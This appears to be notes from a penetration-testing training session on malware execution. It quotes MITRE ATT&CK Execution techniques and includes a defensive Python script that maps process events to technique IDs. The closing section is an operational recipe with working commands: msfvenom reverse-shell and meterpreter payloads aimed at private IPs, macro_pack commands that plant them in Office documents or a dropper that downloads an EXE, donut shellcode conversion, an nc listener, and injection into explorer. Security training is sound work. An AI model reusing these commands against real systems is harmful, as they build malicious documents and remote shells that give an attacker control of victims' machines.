Welcome to the fourth session of the Mitratech training course

To access the video, please refer to the link below:

Malware,spyware

RAT,C2

Malware, one of whose subcategories is spyware, which threat actors use for control, espionage, and so on.

Vulnerability

A flaw in a system that hackers abuse; it lets them read, write, execute, or make changes without authentication or access-level checks.

Exploit

Abusing a vulnerability is called an exploit. For example, an RCE vulnerability in an operating system lets a hacker run their malicious code remotely on the victim's system.

Payload

The malicious code that runs on the vulnerable system after exploitation so the hacker can use the system. For example, with the Metasploit reverse_tcp payload, once the victim's system is exploited it connects back to the socket the hacker bound earlier and gives the hacker a command-line (shellcode) session.

Bindshell

A program that opens a socket and listens; as soon as it receives data, it allows communication in the form of commands.

So far we have learned to build payloads with different C2s, each of which supports different listeners (i.e. bindshells) over HTTP, HTTPS, SMB, and so on. Now that we have arrived at the malicious file, we need to look at the methods hackers use to get these malicious files executed.

https://github.com/klezVirus/CVE-2021-40444


Tactic for executing malware:

When malware is built, no initial access is gained until the victim executes it, so threat actors must use various techniques to get the malware to run. These techniques are sometimes capabilities of the operating system itself, such as script interpreters, sometimes the OS API for creating a process or loading a library into memory, and sometimes the exploitation of a vulnerability so that the malware runs automatically.

ATT&CK – Execution (TA0002)

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

One of the most common methods for executing payloads is using commands and scripting, which exist in every client and server operating system.

Cmd, PowerShell, AppleScript, Unix Shell, Visual Basic, Python, JavaScript, Network Device CLI

Command and Scripting Interpreter   T1059 [Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.]

PowerShell [Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).]

    AppleScript [Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.]

    Windows Command Shell [Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.]

Unix Shell [Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.]

Visual Basic [Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.]

Python [Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.]

JavaScript [Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.]

Network Device CLI [Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.]

Threat actors use containers to execute commands, including running malicious payloads.

Container Administration Command   T1609 [Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.]

Deploy Container    T1610 [Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.]

Where possible, threat actors use exploits to get malware to execute on the victim's system. Exploits:

0day => one click, Zero Click

Exploitation for Client Execution   T1203 [Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.]

Using IPC to execute a payload in the form of executable files or libraries

Exe, DLL, COM, DDE, OLE, XPC

Inter-Process Communication T1559 [Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.]

    Component Object Model [Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM).]

    Dynamic Data Exchange [Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.]

    XPC Services [Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.]

    Native API [Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.]

Using the scheduling capability in Windows and Linux operating systems

Task Scheduler, at, cron, systemd, container

Scheduled Task/Job  T1053 [Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.]

    At [Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task’s schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.]

    Cron [Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.]

    Scheduled Task [Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.]

    Systemd Timers [Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.]

    Container Orchestration Job [Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.]

Serverless Execution    T1648 [Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.]

Shared Modules      T1129 [Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.]

Software Deployment Tools   T1072 [Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).]

System Services     T1569 [Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution.]

    Launchctl [Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.]

    Service Execution [Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.]

User Execution    T1204 [An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.]

    Malicious Link [An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.]

    Malicious File [An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.]

    Malicious Image [Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.]

Windows Management Instrumentation   T1047 [Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.]

Source:
https://attack.mitre.org/tactics/TA0002/
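The Execution techniques above are what a blue team writes detections for. The following triage script is an added example (not part of the course or of ATT&CK): it maps process-creation events to the technique IDs discussed, using ATT&CK sub-technique IDs that exist in the framework. The event format, the image and parent fields, and the sample events are constructed for this demo.

```python
"""Map constructed process-creation events to ATT&CK Execution technique IDs."""
import re

# Parents that rarely spawn script hosts legitimately: an Office app launching
# an interpreter is the classic Malicious File pattern (T1204.002).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Interpreters covered by Command and Scripting Interpreter (T1059.*).
INTERPRETERS = {
    "powershell.exe": "T1059.001",  # PowerShell
    "pwsh.exe": "T1059.001",
    "cmd.exe": "T1059.003",         # Windows Command Shell
    "wscript.exe": "T1059.005",     # Visual Basic (script host)
    "cscript.exe": "T1059.005",
    "python.exe": "T1059.006",      # Python
}

# (technique id, image name, command-line pattern or None)
RULES = [
    ("T1053.005", "schtasks.exe", re.compile(r"/create\b", re.I)),             # Scheduled Task
    ("T1053.002", "at.exe", None),                                              # At
    ("T1047", "wmic.exe", re.compile(r"process\s+call\s+create", re.I)),        # WMI
    ("T1569.002", "sc.exe", re.compile(r"\b(create|start)\b", re.I)),           # Service Execution
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the set of technique IDs one process-creation event matches."""
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline = event.get("cmdline", "")
    hits = set()
    if image in INTERPRETERS:
        hits.add(INTERPRETERS[image])
        if parent in OFFICE_PARENTS:
            hits.add("T1204.002")  # document -> interpreter chain
    for tid, name, pattern in RULES:
        if image == name and (pattern is None or pattern.search(cmdline)):
            hits.add(tid)
    return hits


def scan(events):
    """Return {event id: sorted technique IDs} for events that matched a rule."""
    out = {}
    for e in events:
        hits = classify(e)
        if hits:
            out[e["id"]] = sorted(hits)
    return out


SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c calc.exe"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /Create /SC ONLOGON /TN Updater /TR C:\\Users\\Public\\update.exe"},
    {"id": 3, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": "wmic /node:host1 process call create notepad.exe"},
]

if __name__ == "__main__":
    for eid, tids in scan(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(tids)}")
```

Event 3 (a normal service host start) produces no hit, which is the point: the rules key on parent/child pairs and command-line content, not on the interpreter name alone.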

Tool list:

https://github.com/klezVirus/CVE-2021-40444
https://github.com/mgeeky/PackMyPayload
To run shellcode, the following C# source code was used:
https://github.com/HackingThings/SneakyExec
Another sample code for running shellcode, to demonstrate the native API:
https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

macro_pack

https://github.com/sevagas/macro_pack

echo "calc.exe" | macro_pack.exe -t CMD -o -G "calc.xls"

E:\metasploit-framework\bin\msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.148 -f vba | macro_pack.exe -o -G "report.doc"

echo "http://192.168.1.1:8080/a.exe" "b.exe" | macro_pack.exe -t DROPPER -o -G "im.xls"

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Donut

https://github.com/TheWover/donut

cp DonutTest/Program.cs ../Payloads/Test.cs

cp ProcessManager/Program.cs ../Payloads/ProcMgr.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:ProcMgr.exe /nologo .\ProcMgr.cs

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.219.128 LPORT=4444 -f exe -o payload.exe

cp payload.exe ../Payloads/

./donut -a 2 -b 3 -f 2 ../Payloads/payload.exe

cp loader.b64 ../Payloads/venom.b64

nc -lvp 4444

ProcMgr.exe --name explorer

Add the base64 to Test.cs and save it as mete.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:mete.exe /nologo .\mete.cs

DLL

msfvenom -p windows/shell_reverse_tcp lhost=192.168.219.128 lport=443 -f dll > shell.dll

./donut -a 2 -b 3 -f 2 ../Payloads/artifact.dll